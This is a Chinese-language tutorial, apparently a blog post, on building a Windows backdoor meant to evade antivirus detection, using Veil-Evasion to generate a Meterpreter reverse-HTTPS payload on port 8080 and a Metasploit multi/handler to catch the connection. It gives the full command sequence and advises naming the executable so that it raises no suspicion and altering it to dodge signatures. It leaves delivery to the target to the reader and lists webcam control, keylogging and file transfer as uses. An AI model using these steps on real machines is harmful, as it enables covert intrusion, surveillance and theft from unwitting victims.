如何为 Windows 创建一个无法检测到的后门

什么是后门?
后门是一种通过绕过机器的正常身份验证和防火墙密钥获得远程访问计算机的方法。

在这篇文章中将会学习如何为Windows 机器创建一个连防病毒软件都无法检测到的后门。创建后门后可以在 Windows 机器上远程做很多事情,比如控制网络摄像头、截屏、使用键盘记录器等

该.exe文件在 Windows 机器上运行时,为我的 Ubuntu 机器创建了一个后门,我可以通过该后门控制 Windows 机器上的所有内容。

本次环境:Ubuntu

开始安装
1. 安装Veil
作为第一步,我们需要安装Veil 点击这里安装Veil 还需要为ubuntu 用户安装metasploitable-framework(Kali 不需要)点击这里下载

安装后,只需键入即可开始veil。(或者可以通过输入安装./Veil.py目录来执行它veil)。Veil的初始界面将打开,如下所示:

2.在Veil中使用Evasion
veil框架有 2 个工具 (Evasion和Ordinance),可以通过在 veil shell 中输入list来查看。如果我们感兴趣Evasion,所以可以直接输入
> use 1

3. 生成后门可执行文件
在后门程序中会创建反向连接,即当目标人双击脚本时,他们的计算机将启动后门程序。因此,许多防病毒软件无法检测到它,因为没有外部机器请求连接,还可以使用端口8080,它是用于连接网站的常用端口,因此防病毒软件似乎没有任何可疑之处。
然后选择> list打开列表

本次测试将使用第 15 个选项(是go用作 Meterpreter 的编程语言),所以输入:
> use 15

我们需要设置后门尝试连接的 IP 地址。就我而言,它是我当前的计算机,所以我将 LHOST 设置为这台 ubuntu 机器(攻击机器)的 IP。我还将 LPORT 更改为 8080。为了获得我使用的 IP ifconfig。

设置 LHOST 和 LPORT 运行:

> set LHOST <your_IP>
> set LPORT 8080


防病毒程序的工作方式是它们拥有一个非常大的文件签名数据库,这些文件签名被标记为可疑。如果文件的签名存在于该数据库中,那么文件将被防病毒软件标记为可疑。所以使用更新版本是一个好习惯veil,因为更新版本veil会产生后门绕过杀毒软件。

尝试修改文件并使其更加独特,以便绕过防病毒软件,只是为了绕过防病毒使签名有点不同。

下一个类型generate以生成文件将出现一个提示来命名后门,在本次测试中将它命名为backdoor_8080,以免引起怀疑。


将出现一个页面,显示保存的可执行文件的位置。

这样一个后门就产生了,它的存储位置在:var/lib/veil/output/compiled/backdoor_8080.exe

4. 监听端口上的传入连接
在创建端口时,我使用了端口 8080。所以我将在我的 ubuntu 机器上打开该端口,以便在目标计算机运行可执行文件时准备好连接。所以要使用 Metasploit 框架。
$ msfconsole

注意:Veil-Evasion 实际上使用 Metasploit 来生成我们创建的后门。

为了打开端口,我使用了 Metasploit 提供的模块。它被称为multi/handler。
> use exploit/multi/handler

输入show options以查看设置的选项

更改这些设置以满足我们的要求需要运行以下命令:

> set PAYLAOD windows/meterpreter/reverse_https
> set LHOST <IP>
> set LPORT 8080
> show options

注意:这里<IP>是创建后门时使用的IP

输入exploit以开始侦听端口
> exploit

5. 将后门传送到目标计算机
有多种方法可以将后门传送到目标计算机,这里就不再做论述,各位师傅们自行领会。

6.在Windows上测试后门
双击backdoor_8080.exeWindows 机器中的文件执行我的可执行文件。

在本次测试正在监听 ubuntu 机器中的连接的 Metasploit 中,我们可以看到 metepreter shell 已打开。

Meterpreter shell 看起来像上图所示。可以键入help以获取一长串命令及其对可以执行的操作的描述。

可以运行的基本命令列表是

> sysinfo
> ipconfig
> pwd
> shell

除此之外,还可以更改用户权限、上传/下载文件、将此可执行文件作为服务运行、截屏、存储输入以及许多其他内容,这些其他内容就靠师傅们自我挖掘了。